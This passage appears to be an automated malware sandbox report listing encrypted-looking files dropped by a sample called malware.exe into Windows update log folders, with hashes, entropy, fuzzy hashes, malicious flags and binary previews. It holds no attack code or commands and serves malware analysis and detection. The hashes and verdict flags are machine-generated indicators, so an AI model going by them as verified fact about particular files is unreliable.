                        Preview:.@Gv.K.....~lt(Ck$[....k....v......1..{...$%..G......g..0Ocd....\..*.lov...cM.i...{..'W....M..S..V;.....dZ....E.\V.#..0.&P.%..;...4Z-L..I..N...!k..k!..h.X...8Hl.!. t.1{..n.Q.....67....g,+v..).d..!.9.....'wm,..#.....vi.......rd.5.l.).:..........I.,u..(....>L.C......#.U..K.C...t.._=.[...._..T. .Rje.N.FP.:.A6.i:.O.Q..9@..h...@...3.......!..(.;k.~.]k..eg.51.......9...o.J...~.%.....Q........Qz..SB....L.q.....kT.>.y.....].....i.g.>...../...J1b9I....}..@..~p....%.....bb..Stf..`Wj...w(...zmFt.....{.A..j..2....m.0....pQ4.......&...I.J....ia..7...:.F.5.7?.Y_;F.L.f'7.9...5LDc......B!......C.w.x.h.4v..,..X.pl..M...(7..U+6..$.......S..P.H..<..HR..R..G..^...Aa@.R......^E@...F....b..w.5..:.6..b..S@..I.{5...W....y..>.+..eO.>..E.A.]T..o..C..MM..%.di6..y.i37....N..T:g...B.e.....w*2...{.V._[*..V.q.....b2.Rb.:47..MQ.mv......f.....}.c....B.K.h.>..>.B\......^...#..A..|...^....aR..2#.5.!..!..&......{(QF%........K.N.TG..&1..*Y.L.#Y.s.....0W.g.s.......Q.+.W..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.4.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997934490166307
                        Encrypted:true
                        SSDEEP:1536:m6hsI1RU5o7SOEW14f+bDuK2t3j0sY7a+n/rfIvR9WV/GrQvUGc:tRU+AKKTlV+/rfIvrWQrQ5c
                        MD5:4B10B71228F7075F55CB341B6927A0B7
                        SHA1:A4F8027459B956894662E7F39AD4287C4FC73CAC
                        SHA-256:D299733332551340D992CB5F91E0218610EBC6AF9A44768AE55A72F88F041BA9
                        SHA-512:E3207AC6B8C811E3009B56AFACED8C8F61853680015F77153912F212491AB37DF2846E804635D37E1059E5E9E4AA1B3E39EBF8FCC694035AF14BC6A2EE4C7C88
                        Malicious:true
                        Preview:.0....Jz..Y.BR".. .....i.O...........h.<.P..7.\.._|...c%~...^.......534.P...j!...tw..T..c5.2.'...`.nq......]P.q. ..yh..C..).l...EG6...c._...1...GN[..6..U.............o...W.).....JH..q...?.v....oi..k[...........y$.<2F.G.~9..g....+.......!..'.?x_J.*4d.h*.\\.F{.,]M.N..>I..Tg..A..2...-SXz..#..Q.D.$...&..YI.Q.....7qmq.C..Cv.5y.....z_.(..>b0...U.WW~.....1k.].O.6.g.s.6..-.F....#.f..}..........X........{....!|.&...i-.)..\...J%O.$L..i...'5sE.B..X/e.r".+.....'.r.9..O..g...8N.T..!.....c..GW.G5....34.....z...W.nk......=....#-+.6L*....6.K\.f.#(.*.....g{S.xo:.A...z...Rm.q..Yk3C__.5..W]...s..5..r.4.....w....73....E.)B..vM.D..#T......S..0!.._:.8..+..LW...#T...,.1..=MR.@.)...>..W..F..,>..zD..ky.E.......~`a...I."....&........3......T>Yp.u..J7.]..k..#.......}...;..%.......k,n.I8...7=...u.....#]....U..bi.....#.l..........PS([4w......N.%.l%.....^|(.. 3.....O.8..]C.n.c..-...F..Q.b>./J..S........ZO.n."......6...'~..k..-.......EW...Q){..Y...n....d^.....;R.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.5.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.989407922261574
                        Encrypted:false
                        SSDEEP:384:Vdb/V1UkFydC56TDQjMK84RE0PFfowrhMhuQQ2khuDO3qJ:nbdv56PQc6ZP5ow+v8uDOM
                        MD5:AB90C9B9D8CE77290B03820AFB8AD8E8
                        SHA1:BCF927FCBAB27746C8B5CFB70859828F98681B18
                        SHA-256:EC9A45A576E205DD44D9BDEACEA70E704B621AEBF795CBF8A6CD4C652A01EDB7
                        SHA-512:18D9609CA613324D14BA590FBC592C6592AB60120997ECC149305477C8CC32D8DE5F5505ACB3DE11EF583081E83CC4BE156F4B7D375162D46E031DF483A35B5E
                        Malicious:false
                        Preview:....C...|>0;..X.e..G.V@...h...L...45..eN.\(.....s.(".D......^>F:%.......Q.ci# .J.....t....y@9..d...g.ip%..<...S{..[.........=J.F'M1f..z....6..u.$.a..4..._~.U....f..q8`b'...........6...PP...G..h.}..L.%@...-.....qnJ.`n}0.\....O..D.d...ck....t...&.q<....>7D....-.Si..y.d..uZQ.W.tc1.....j..Q~cs..|s.t..B. .uN..c....A..>hA....."....4....3v.a.9..w......!.........//.5.H2...b...M.Y.)......v&...g..`..M.2l?....W..2....].....{.w....#.6..te8..Ke.I.A..:....3.v...~.....$.6..N:..Ke..M+s..o......R-.!`fc.m.. ...up...3.......!%.|k.h....sv:;x!.K_..F..N.m...)z.`6.Tp:......8QG..u.<...k.zl....~....-......p...m]...A. 0-..,....CgP.H.5.H....3..?.^5f.....y.........Y...s.c.VP.Mn.../M.m.L.Q..r.W..........22..........qp..Y\..G.nW....s7.c....P...>.w....Q.y..U..7...V....E.[.R.W.b.'..7..>4.....p..z.....K..L....f5.Z.E...z.0......!t.:.7..#?.z.9..G.S...|K..r.k.LYq7.H.;..X......Z.w[.B......H..(.S...QY.C..Zh.X..U.g....D..#,..SCgX.e+.;K...bh......w.N......o#6.>.@..B._.b..

                        C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.0adf0799-3e94-4c42-8473-2e913166e535.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.987103292173635
                        Encrypted:false
                        SSDEEP:384:OxqYYCv6/c6eaLYNWAU8WnJfj6uFLvINw3pceqkiepRWK:c/YRcILYNWA9Y+wSw3pb8K
                        MD5:5A4B804E7D1CAD1DC8D9DCF9B0B329CB
                        SHA1:18B1C9230F1E83F520805274B71476B6A7468590
                        SHA-256:7111F77BA1C563EA8D21DCB867C62CACB7A671D4C10AF7F15F92F0D51D84C6AF
                        SHA-512:59ED2D122132A6036B05573FE2734D424A5C2FF38B195CD1B0DFBE54E815E9061608653B4A1336749695A534125C68D30AF9BEECCD9497F9120424FDA269D0B3
                        Malicious:false
                        Preview:.X...!.Q.u.A.O,..%P.JR.8Z.r....M;..t.qd-n$..m<+/3..4.>..:..e....n..!J....z..7e.w....E.......<..y`..\..........SM..6...aZ`...r...{~3\.C.r...w...,...o..l.t.G'=.q..L...}.\x...f.i...S'...W..b%"..r)h...8o....2....^%....3-.TI.[$.j.Y5B...9;.s.q{..wh0..w....>4.V/...'..H...x.k..IL...b.W..lJ....NQX.v...:i....&K.6.l9....TP.t5\0.. .+..Y......x..1...dw..N\.H..'..C._..9.r...A.kva.`.......l.....%.K......!b*.........a.C.).Z.......Q..\..c.tjU...7M!I.....!...E.....{I..~<Bn....R...w..[Q....dS....q".....><.%...!;:.%u..D."..<...sW-r.G..q....{.Rt..t;k...[.;..R..Q0..3....E..U..d%.]_.&.W..a..N....>.H.6|....;.G.....B.f.o..Z.{#.%.%Et...L.k...F)-*..K......$V.....c....J..Q.y9?9.MF..Q5..N.."*w.F.f@G.<...&...6..enw....Q.~.."R.Z2....B.....W)..]..B..i/.(.}..b..^-..e.D-.......30....J:......:2....h.f./..$.;.p.-..z. ....h.....T....5..^X.c......U...-...#fck.....^K .....$n.pN...)....u..e.1......J.G.R.5....}.>q:yi...M...p....L jw.-0.e .._..f.........Q.g{TV...wk.SA.....;.r.R7

                        C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.40e9bdc1-a29d-4b1a-a7d1-bb2a3737a6de.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20588
                        Entropy (8bit):7.990500570515809
                        Encrypted:true
                        SSDEEP:384:5gQqby+5+vtY0vmrnJqRsYWNhADIcRUoM7FXs58AzF0wUqkK5Hy0nL2ebBnZDUBn:525Qt9mLWIe0c9MJX8zFQ7K5HyA2eVZI
                        MD5:264294BE9A308DB17E033F7CE6DF35A8
                        SHA1:D84D48F63187FAE38CB7616C752FE654B83606B7
                        SHA-256:12112181BBE808D37C45A06C8D797E248BD26331971F643BBA2F533F30E68778
                        SHA-512:27A72DA8B722E053EEBAC18064DEDCC65EE6842A08D7E9AC99C2A49579E95B472E9B59BD9A7C5382EAD83F07306C2A97143AE3B5113E70B08C8369F2B8BF06E9
                        Malicious:true
                        Preview:....YN.z..q{...mN~..nKb....s..}z....x;..!}...C.a|.....j.N.T...|6.=...n.[.K=.x.O:....o._4..O&B%....R...3........[V....|..*{5?.Xjv........0.pT./..cZ..;...x.yD.9..a.rg....C.T.....CA.J...f..,Wj....6.a.l.ZU...2Y..u...*W....z.....=..}....\...P...,MW...C....L..|....."..| .".\..7..3.A...+...Vs.!...t...W.c.S,.1..v.I..R....jW..1K..7-z,..S.R...n.Xb.6J.g:..N$.0.o....#..g..Lh..;.p.:N..N.y....?.!.........M^...R.B......sd..Yl...Ug.....X..9.....*.z..mR).G.....]........y.r....+......y.U..}..........c.y...'K.bY$...].Y.Jc...8,`2....P.a...{D..o?....%.U~.n..c2Cs9[.<%.8..i.Fe.........s............/...v^s.r.+.....d...W.%..=..e..\.......c..m<..,y.(.4]..L....<.1.""..+.y7y]@.8n..J.....F.=..MC.....!:..c1....C>........a..I..."[.,-"nGY.?...n......8$+.,..b....IB..`.=.k..A....R......{....|..}V..'..`W.ET.....jl..l{....yz._2.wW...6M......e .."R......\,.......Y:..e.......v%Z..B.(:.* jk.H%.&r8..Y...T.....z.g..NeWh...s.N..5j..*?QZ..K*.0.y.w3.}^...f/...E..i.*Ol.Fl*........G..t..`..

                        C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.42b4feb8-6840-4be8-b0c4-012e33ea89b4.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.988544297615081
                        Encrypted:false
                        SSDEEP:384:v8KzRXi52a8TImidQ+OjaPQ3Cfr72DVCJ1wx65JUPIN:v8KVXi5J8SdQJaPQmtDwx656AN
                        MD5:28C89EEAE9BCF0226B47CF2A5C3F63EA
                        SHA1:CF59B2EECAC5BDE4B2519B127E4C3EC711CA3E42
                        SHA-256:6E5EBFD3E03684E30338FFC250ECAC730FB1A9548E8B8C7BEA261371C0788BFB
                        SHA-512:AF082C9EFE4674258BB6D917B394F4DFD311C83DB9DDBED2D9C6F8AF1A887CB544BCB346AEC1E02B1CA0F320990BCE4A4B42D4BEE9EF70035074EAB5658AB8D6
                        Malicious:false
                        Preview:q{*.x$maX.....[.<#d.....1e..._...S..s.q......7.|!i...m&.&...Bdih.r...=..C.).,.ZZ......6L..3....."5H..'....;..[F%........:........... ?..@y..g...2..]..uN.....>..Q3..-.,.=....Q..h.....1..Hk.s.......jz.b...X.N....n...L.Hh...!$...-..'........_....&.<..mU.........S.7,4..s...3#....K,Z..dA....}...g.2.......=...j......=K...'.._8..<.X{..&`.*.Ox....%.".u|.`>...Iu.$rb......]..\..Y....X.....R.-...{....ed.y.cE. ...0...;....Z).1..3@...p...'...IwB@]...g(..`.N..iP..%..x1.x..".F.}......v..z%V].\...!...wr..>....r.%..(M.a...(T%Qg..S...x.....V..)f'..)~$0J....?+.N.YNBX.34)..\Q.._p.WQ.... ..."..Z...+t...r.v.v...a.$P..[|.$]0UnCD.xe,g#...)..c..h.G.Q......J\9-.(.*L. `OQQ.Fv....EN...z...&@..s..]..@.L...7..+oC+.nL.@]W..:..bx....W..0i....../....S..b.>..$...o<$.(.........o-........=.[..x.U.:.P2V..`.......1...7Dz......7....".M$...(.Mb..)E.dw..ZP....?...=x<..........Q'Qf._.7...M....#7.f..~...I...2.`H.d..`..s..P?...N..6p8j.....o.T.....5r.....y@9...........I.u.)gm

                        C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.67cb7f29-d6f7-475f-a841-5601397646d6.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.987986304330053
                        Encrypted:false
                        SSDEEP:384:6TXA6zL60EmMuFFK/WLRKSzsIWA329QyG1v32hrevOhs:AXA6+0EmXFK/+KOWTQy43m+
                        MD5:30DFB2824DCA0962CA90DAF261CFEDBD
                        SHA1:653659769133481C9C3B2561DDCDCB3FB9D84728
                        SHA-256:83D353D6A7EA6D599AB012023A3257EE4CDF8B35E0DFB8FDC6DBE1C038722F63
                        SHA-512:4EB1BA6E438F0C33BA696873D4AB8B05612E3171B31E0DAB79A5087A21A4B7725562A7A6D53E1FF4591F03C9DCC9A24E60318FE0698BAE7431BB5EC4678A95A4
                        Malicious:false
                        Preview:+.\....c.[2....[.g.z......rO...qV.....;...R.6.......K.;....r...lX.......2."...N..t..,.2..i.......n.FD..wr%.......IGC.....4.>-Mv.1s`.%3oS.D..9E..P1...l....T.s.F9.I......h.....c...Z[D@._.a{.c....t=+.....e......8.D.|?:`.,%!.CF3..+`Yh.1._1.pY.e.(.Iazw...6.l.f....3..<n...=.P=B.m4..R.....u.7.g.v....ITF..}q.._..^.w.9.......{....<.o.+!3o..-....#.#.....P...5.....z.......}).a........2...!.K`.E..~........Cy..m........zu.)@...a.^@.. .Na1.As@...Em..C.~.m.....`...4,..IU.1.....J.......d.oo..5X...8....!d2p/..$X>.I..q..%...3..R8.T..tB..._t...{.F.n9.0..`$.Fm._M|0..4A,.RkH.pv.......V..D a.,.......r.D......[...\..R.}!.2.f-.....j...........8..!>;.>?.....K.?c..d.H....y&>...=...N.E.-9.E.s....ju=...m3...l....L..[.*.E..z.....+......L6.............. ^W.(.-;....0.Kk..D<4...._.6.}.X.+...M!.....7C.kI2hZ.A?.K.e..K...........>.!..h {....;......O.CX$g.f..$4.n,RF..H..}...XSV'...}......kOa.6.y).I9..-..y...m.(..lA.D.....t=.iz.9.;..1....S.=......v.....^s.Jg.Yv.V..n..

                        C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.714134a9-36f4-4184-afde-93de2db07787.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.9897744223752225
                        Encrypted:false
                        SSDEEP:384:jJlA/Nf/0ptjShOGFtSh0OA5SX9p7vo6GoYCCaelCp3RS4bsZTz0yxv:jE/Nf/0XQIZA5Sj7voDoYieAp3tsd0yZ
                        MD5:82FAB717C3D56DFB656922D026ED1CFA
                        SHA1:7762886B097655308D904EF0723F54F774D739E2
                        SHA-256:FD99C2642D423D8D6D6ED2F810EBB4E779110F4A9A48C19790E62E27DA227E65
                        SHA-512:4D8E71AD297968DD85967FD0CED9D3D4A989AD9F279C6C64DD2C8F779DC17F2AE1A1651BD41CB71BB7DE1B1766BE832E7E23954BF1BB7075ED277CCE08A575C7
                        Malicious:false
                        Preview:.3.+....$.!.a...*)>.N..$..N.........N]....!...B..QP...6..|qt...'..V1&-...9...CW."...J..Ug.)..t./.~.sc..Gz@A...&.$9E/...L..`....AJ..zX&..X.x........%.....q......y,....(...+ud...j..GM.-l!....e...w.?....u.....|d..uL..p.v.g7......<k.Y.|.l C.|.0.....KL.~....h.!.....]....'6u,..|>I"EgO.s5).03....y............... U..%.Q0....gu.H....Y+..Q..$@1..A...X....7'.z..s...f....g.c6.>....t....b....za..U..1...@p.[...+'.R@L....}..p..$s'w........g./.KHL..&..G..WN.....(.....+..Q;F|.Ee-j.<.0.-N...4J..c@...~5P3..,.#/5..TP..$N@......n..i.....r.Z...).....u...@...\....M...5..".Jd?Q...Pq.C."....A...=}...... 6U..p.........Q....{.+...Q.......1R....,....z.. Q...].-...<.B...._.x......K-.n...l..X...m...*%9./.. s.)..E..+..3A.[4<3...>.x.....C.Zt..q....R...n...f..M|. ZJz.^|@..hKMTR.DaX.RY.u.&.d..[)..1z!........A... .tj..Vs..0..B.".id8...F<..Y...U....w....f....8.. 5\..G.w._...&...Vgy...p.....yt....Ik........I.....P4..-...QVn.<.g....q.... &. Cj...P]...a.._>..yJ....7.......t.J.

                        C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.d9153e59-8b6d-4e50-820b-5bd1210b71d0.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.989217849723037
                        Encrypted:false
                        SSDEEP:384:E1dWXq+C+fOuWLc1Yk0LPwXj0fxO5SrRRvGz1s68aO1W/:I+L2uHnJ5sG38H1m
                        MD5:C4108BC9C4473B86C00478129BCC7CF2
                        SHA1:48FB3C29E312BFE2EFDF691A92F909BF7F75BB47
                        SHA-256:82C2279A8F631CFD3A0615CCC99C35ADD6F42893CC4090C7A0580A64C666EF3C
                        SHA-512:23CF508F55583FC2A8424CAB0261072DCCB79C7D724EFD5F426A273B22B616049699D648AB85026E3697F3D513EAF1055601FDDF53E6DCDBA3435B5A21CD127E
                        Malicious:false
                        Preview:P"j{..C0g..!O.P..a..g..H......c...a..{.J~.&.54.WV.x.......]S\Df,...q...?.p.(...a.I.P...ar..u..p'z&T...i.!m.-............T..b8..o...{..{F.....'V.........~.[~......Q@G...e*o.....`..&...,..K,R;.O..Fv...r%...4DB.Yv......!w.9...a.Y.".#7.}.z.....9Y..+.siJ.1...<./......O ...L[..;6...].4H4...Pq.o..%3}...7G.z.F..Q.....u...)s.qT..=2#..........=.1..x...FP.....?..Xv..Nc...0..{ ..X......_.Q.K......ff|...@x..+.h.....Tv8$..|.....q$iE*............x...zt..(Xy..NL.!g!.L.~y...`.......n.....]9.uS.....o..K...N.EK.*.....I.g..,-8'..<! ..7^%..>...c.q{..P..>.l.8......{.;sr...d.8..o<.q........#2@n..0...{_..]b.....^CQbf.....KCqLL4.d...%.pU...{r...,...iz.J....z.v......t.........96my..}G.\\5|b.b.p...G...u..9..,. .z...yk.....I...H#......P.W..B.R..'......n.;6.Q..UDU".....L..F....0h...............`J........ll.Q.....o9+.E.....x..L.|.@......2A..~.>.....>.F./n`!...b.w.p"d......W...C..d....^Y.t...:.....9...pQ.._xf.M..$h.;.p'...N...S}.V .../i.|$f)t..}.78&A.C@..1.t......5i....Vl

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.34d6959f-ba72-4445-8c5e-3b9c8a68d4ba.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.985220409938998
                        Encrypted:false
                        SSDEEP:192:GnJC6vKty+uxg2S3W/Jp0fK/5HJspKfWrwUCGfS7/lL3MMAttD9bEnMFN26H8:iJ44+uxgSxaQp1rL3M5CMFgG8
                        MD5:7BC243B820F62477C966BE54F44C3A6E
                        SHA1:24BA998AE9EBA5D4F7E5B78ACD764E5A24DBED50
                        SHA-256:50BC95627F9CB0CAC87113807D25F9EA51209C9CDE16FCF356C4633ADD4E1E2A
                        SHA-512:C79035608F2E09D80DEFFD583050999FDDEECDA4EC71A630705E1BCE94BD274A0844552C7DF351050880A0DDC49CA7989C707DE31AB94759D3C38CA700FF40C9
                        Malicious:false
                        Preview:..uhyN`..l.+Z......".......4..1........q.z.>...."E'..I.P.._..J....mp1A..[=...9.Iz[G.y...R.e..Ru.Qf.6.1{....u...=..U.~ U...Ab.0..#x<.C..+........E..2&..pK.f.9..I.E..s0.;3l..c.}...1..Uo.7..6.TR......\"u..D.:b.b.N...E6{..d.....J.or..8..n~4 v..0.\..=XQ.?......HT...2...!....o........^....h....J.....Z.Q.r.C?b..A.l.....,.e..Tp!......V6..y....x.k...M...._.T..^....V*..j.w.w.g.X..`.....0m.f?bd.r.[.lbT...|W...kq....#...q.u:M.h.`.../o.T....p...S...n.\UHk........vE.....#.p.-z.Od.....v...^.H..[.....(....,p........M..?>$.....R...Z\.{..../T...n.....3..T..v.u.M....f.9UXF..%...f-.&8.'.EY..H..gn..s.}...ki.H..N.3.}W.$vd.1l=...[..(.....k.]gr.....V.k...U.'....O.....&..%.,.J{....}N..."..H.:{.....;.V....uN.00..L.~B.nH.h....$....b..!/.`.(D!v...uL..|.q3.H5NY.....Q$.D..........I..!....;.y(.R.?4.3]A.'w.6B.EC.mD......Wj...9......|...$T...arqO........>.....d.SXxS.a<.y..M..`\..<...6zK0x...\.`x.o.K;%3]..F.1.?.k......d...0-..+......y.o..j!.7...4ovV...=dT=.O.a...eF/.

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.38d16f6c-77e7-4d58-b02e-84350c8fac4f.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.986627432520637
                        Encrypted:false
                        SSDEEP:384:b0Yg/9DUtLTfHYL0cSCMHep+jhvyJ/tAn:b0Yg/9YdHYLiCVp+jha1Gn
                        MD5:9CCFBC7B840527C84EC57B10AC69BA50
                        SHA1:8EEC546D65D0852469AFCF17EB6969618660B8D0
                        SHA-256:FA55B0D4439B8BC75A7E1365FAF736D2CF7963CBF7742C57CF52313667A72CF7
                        SHA-512:BCB44BD81D0EFBEBD60E7F24D0046E6450738E222571682D64DC3E3BC695005BCEB47D920EA226AC17F1005BEF96E71F75F8F02068415B2351946AF78E314C4E
                        Malicious:false
                        Preview:1.....xC...p.....0Q.....C.'.FW.y..=.|.1.I.....-(...c.$....<.O..N...._[..&...R..tV:..).V...3O.......C......tI*U.....!..8..v...Tl.K....DAM.^...9.D.&A.>..e..-.Xy%.Y..<.qw.fI=|R......K5v.^....t$..A...Z..u..n.U}........Y!......_.2...n..o..?..].:..~... !.....D^Y.>.....SPW....Z....L....L..+..}.W.....e=a.S..^..P.;....6.Fb.#!....<h.D.3QN...|..g...x8.H..,Q...9....v5.j.8.............8.6..%.8..,.L..MZ...x<..\.:Z.o.n.."h1S.`"M....\..F..._.......[F..+v*..%qa..3..a7.X=n.#..0..g....=:9."|}.J}.!-..+<.O:3.V.j.n...0L......(Z.Z..k?r.1...s"E.6.Q..H....C.w..v.t[...f..$.T......a.V....l.~.^...u..,.H...*..H.......J4.W..$v.......l.z.r[0..xq.e[J..Q.?....J.M.........2.*......$.....3^sj;..x..s.e.6eH.tH....~.t...\.......i...I..x..P.Pzy...T...q..<@.Ij.$.G.....|.....r~......TX...A1Txm...,/?.WwQQ........rx....:.9.T9.C....1...z.............W.J.m.=U...#.l.{B..........}..I..Q|.......O.\..%....rr/4DrU...De...usb"...F."..m.*.7..Z..:m.r..u...R5$.....C".?.... c....o.X

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.43541b6c-efee-4aa5-b4c5-a42b9c3a69ac.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.985339096592126
                        Encrypted:false
                        SSDEEP:384:QR3RxDyd4J/M3U5ttrsdwBud0pZ/SU/71:QR3REdaE3U5XsAxP/SUz1
                        MD5:C7DC184EF8F86D0EBC1F5F8A64444ECB
                        SHA1:2686818DFA304E155CD0C73326D009AEDB6ECC8D
                        SHA-256:8A4182385C405E978265FE4CBF58ECC3E7BFC656A737CCBA548AA1C74821BF81
                        SHA-512:659FF672C28282831C0EA5BDF5F287CFF2C87DDDEB9B879E49941E6B6D9595DB4908DD8EEB2742CF93D7851B0657452799CFAEE16D754389BE42118928D2FD09
                        Malicious:false
                        Preview:'{ESG...+i...H...a..@..Q.....m.._L.....$. ..r;...W.}.g1..'n.H....\....3...".N0rl.e.Y.&..[(...v...;u......'.j..0S....e3....._&B..].....6.a".#...qc..@.[;1...iH....?...F.....79....]..O..f...C..zmP.h6..8..I.?....E.r......h.:.$..8y\..V..zW^.5.2.......<.m.OUE..r.|!.l.........mmAmrX...*.Q..}.R..%.U..,]/O.NB....~Z.-. .]O.6..^q..F.X.X-.*.^.....z..0...4..-.P^q......<./F..w....N...O_b..8.".&.^...B...x..U..y.x...........0.3+.g..^uk>......>B..9.yr/..X.M$.(g....D.;.{N....J..%...o..^.qs..t....V ....I...v...A..g..:..zH./..M.i.(P.<..9.g.).-Sp.......f4...>.5[(.|..v..f&8{...\.~`..qN.C.!.WI-}uA.'%.A.<.c.Z.../..=........Y...>*W..'..M..2.O......d..~..J..,<...6..C"..,..-.q7....."....~AwM.`..R<....^.V.0?&#.:..W_....O.@.!......W..-0..8W....#x.\7...3p.M.&X4."..>.f./.k. N..2# ....9.... j.^...:[o.Z...<....[v..]..\...b...,.....V...%..@..\...C.;..&..k..,(..w=bC..Ls.... .$]o..9[b...|.L.._.M....f..dF.T/....j.{f{..e.O..t.6...P....>pG..y.z...$*0].j...`...Y%x..

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5940a5f1-c2de-45d0-a8bc-5473de2d0969.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.982828036975095
                        Encrypted:false
                        SSDEEP:384:LKRw8iSM/9hxp8uM3xmqWi2YM/Um0301uOIGjVPwJ5NBkgf:8M/pGuY/1bYUm0k14gVkTV
                        MD5:9DE75761EB2A5BC025111107764F8F68
                        SHA1:A77D069629212CC6D02D2F76631B7ADFF20447C0
                        SHA-256:03899B0349AFACE329F36C8F5B32176E151F9DB6E91DC34499FBE801838D4C80
                        SHA-512:CCF9AFC262D0C379FEB0E3DDA76B86D428DAA4BA35C6C21E820940D3BF2874960AC81966E9F3BAB43B75BD51271936EFADE37FC79597AB598902073F8D1F9FAA
                        Malicious:false
                        Preview:x...p.?j.....j..4....,`.m...u._.....U....+..F...Co...}.'c..........5....@...=O.e%.%.j._..#n$y.d5...W.)...2.......M..&T..9.DR...},3.G.|{.U.,.....w.W.KK..n..q.n...Y...d.9..C.0..}..{..9..f....!..<<Q.$W....{.mP...c...a.\..QB..a..`..dF....E...9.I@.,g=n.2.y..^....Tl.....\..%=.~$e".I..... .+.....+]Y.+...b..,F.R.KmZs....._.e o...5.b>..[`6.q.QL..L..Dl.poy...L.q...#.J..N".`....5)...0.f#.;.G...I.C.@....g....Z.}....;..<m.....f..(..t.QE..i....b ..`..b%..N.3RQ..[.0...U..\28q.+....Z.}k.f..:f...(..fA.....,.G+..d..7.*.l*`kn.\...=....U.`.....r..'%W....i.Z.T..R=_}.l...#..U.kx.x.'...#...$.v(.C.c.R...HA.@...oH..4=.`*.....5.G>z\..VG....k.!.ve.....<...u....<....=..[..\..3.>:..Yu....{k..x....L;.*./Lx......f....kk(x.N.g`[..y.C..........s.f.*.{...$.........c..aT.....[..0yO3.....-.\.........sjm.p.H.(....+H\J.a^c....;.CH.....Zx?.r.....?..dP.$.U;.mL.w....*.l8.=l&.v.%} *.$M.z(..>...Q.......4.S......aSIa..t...P.[@E ....+..R1.5..j}4..[.jS.i...-..../.....s. >.i._nmH...........Tl

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.689068d8-8961-4f03-9c8b-c49f48319a55.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.984172881513812
                        Encrypted:false
                        SSDEEP:384:KmRshvk+B3cxnmy9/NAJ7vo/JdYwx6v1egCSf3:HUvNBssMuJ7o/JKwgv1Jl
                        MD5:1CFC2B85DBEAE8709A518E6583684AE2
                        SHA1:39FA44F5AC27EED3E1665C5320E4CD32FC9BC3BB
                        SHA-256:84C77EFB5F20E0AD73D76A5FA96311C723FC46F413333E06F8E7CC793CEB4772
                        SHA-512:B52FF26D84B3CDC638FA2206D73AA5D477FA2D4C23CF09D6137B240ABA9C04AFCCE9455B774BC7693AF9CE23DF50E9B06A2455918F2576532AD8E9EB304E2C8D
                        Malicious:false
                        Preview:..r.\R..9@{N..j(.]....6.N)/.Rm:P...T;...<...:5.......U..s...E$i.%..E.......qM.]...4.6..h....m..0..os.ft@......$..|..Uj.Y\....;..6.E+.r(....5...!5:...*..$c)........%.aY...y..,.._Ko...f.PaI..I.....\d..uUL/....=6/xU.-(.g...&..q...VZ..E...w..'...wG..^..~[....K.%.Hn=...4^r...k^(f..".j.P..........Oq.y...Z.4.B."..q..b..|.9..V.]...{<.m.bz./..'M...Z....TB%..a..h.].......W.eC..t.a."@.R...>.<4...T.."*&.T.VK....q>5..*.q.b7.."......&.<.Hb....|{...........-s;.Q............8.<X....,...Th('............%._>..uA.h.....<.>_.u(7.D{..u.%.c=/...w......lz...w.?L...S......c.....jh4.u.T..>....AbN..-..k.a.........`.`...t&..&...Wwj4.|.......-o..k..!...n..Z./.&.+.y1 ...JF.5......E4V.i..|..MGX...|..M...4?........C.,..8..#_...>E.X.....B.FyB...>...>.@...v....q].8.1....j..v."..N\O$...C.{......i.vh....+...EZ ....8..qm....../.....=.T..;.O.L.0...@...>..s..+q..W...6.._...G.)Lsd..FGti.....V.I.\o.&j.C...d.yBX...T....c.}...J.H......R...p...C..@......M..\%]..0A0p.x..6Y..

                        C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.77f7aa7b-f6c6-4a8b-ba20-b69877d24f0b.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.983905830799414
                        Encrypted:false
